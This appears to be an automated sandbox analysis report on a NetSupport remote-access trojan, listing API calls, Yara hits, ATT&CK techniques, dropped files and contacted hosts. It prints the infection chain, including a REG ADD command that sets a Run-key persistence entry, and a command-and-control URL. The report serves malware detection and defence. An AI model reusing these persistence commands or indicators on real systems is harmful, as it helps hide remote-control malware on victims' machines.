                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: bild.exe, 00000004.00000002.4158412935.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160269643.0000000004F8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000009.00000003.1904526091.00000000011B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: bild.exe, 00000005.00000003.1825934051.0000000000A52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
                                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-22450
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end nodegraph_4-57386
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016DA75
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,4_2_11147750
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174A5A mov eax, dword ptr fs:[00000030h]0_2_00174A5A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00178AAA GetProcessHeap,0_2_00178AAA
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016DA75
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00175B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00175B53
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DBC3 SetUnhandledExceptionFilter,0_2_0016DBC3
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0016DD7C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_11093080
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_110310C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11161D01
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116DD89
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4560
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,4_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exeJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E190
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109E910
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016D8CB cpuid 0_2_0016D8CB
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0016932F
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11173A35
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11173D69
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173CC6
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoA,4_2_1116B38E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11173933
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_111739DA
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_1117383E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173D2D
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11173C06
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoA,5_2_1116B38E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0016C131
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103B160
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015A8E0 GetVersionExW,0_2_0015A8E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,4_2_110D8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
                                Source: Yara matchFile source: 5.2.bild.exe.6d0b0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6d0b0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6d0b0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6e510000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6e510000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6e510000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.2d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.2e94800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6c760000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.4158412935.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7552, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7720, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7988, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		3
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		2
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS44
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		13
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556890 Sample: file.exe Startdate: 16/11/2024 Architecture: WINDOWS Score: 88 37 geo.netsupportsoftware.com 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 8 file.exe 19 2->8         started        11 bild.exe 2->11         started        13 bild.exe 2->13         started        signatures3 process4 file5 25 C:\Users\Public\Public\...\remcmdstub.exe, PE32 8->25 dropped 27 C:\Users\Public\Public\Videos\...\pcicapi.dll, PE32 8->27 dropped 29 C:\Users\Public\Public\Videos\...\bild.exe, PE32 8->29 dropped 31 6 other files (3 malicious) 8->31 dropped 15 cmd.exe 1 8->15         started        process6 process7 17 bild.exe 17 15->17         started        21 conhost.exe 15->21         started        23 reg.exe 1 1 15->23         started        dnsIp8 33 45.61.128.74, 443, 49730 M247GB United States 17->33 35 geo.netsupportsoftware.com 104.26.0.231, 49731, 80 CLOUDFLARENETUS United States 17->35 39 Multi AV Scanner detection for dropped file 17->39 41 Contains functionalty to change the wallpaper 17->41 43 Delayed program exit found 17->43 signatures9

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                file.exe50%ReversingLabsWin32.Trojan.NetSupport
                                file.exe51%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Public\Videos\Video\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\HTCTL32.DLL3%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\PCICHEK.DLL1%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\PCICL32.DLL17%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\TCCTL32.DLL3%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Public\Videos\Video\bild.exe49%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\remcmdstub.exe13%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://45.61.128.74/fakeurl.htm0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.61.128.74/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.pci.co.uk/supportfile.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                      		high
                                      http://%s/testpage.htmwininet.dllbild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                        		high
                                        http://geo.netsupportsoftware.com/location/loca.aspDbild.exe, 00000004.00000002.4158412935.0000000000A65000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                            		high
                                            http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              		high
                                              http://www.symauth.com/rpa00file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                		high
